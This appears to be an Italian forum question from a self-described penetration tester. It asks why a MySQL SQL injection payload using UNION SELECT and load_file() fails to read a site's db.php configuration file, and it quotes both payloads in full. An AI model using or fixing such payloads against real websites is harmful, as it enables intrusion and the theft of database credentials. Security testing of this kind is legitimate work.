Sono un tester di penetrazione e sto lavorando a un nuovo sito Web vulnerabile tramite SQL injection. Questo sito inietta con questo payload:
?id=3333' union select 1,2,3,4 --+
Quarta colonna della seconda selezione restituisce in risposta.
Inoltre sono sicuro che "db.php" è presente in questo percorso:
"var \ www \ vhosts \ mySite.com \ httpdocs \ lib \ db.php"
Ma non riesco a leggere il contenuto di "db.php" usando questa iniezione:
?id=3333' union select 1,2,3,load_file('var\www\vhosts\mySite.com\httpdocs\lib\db.php')
Cosa c'è che non va con questo carico utile? E DB è MySQL.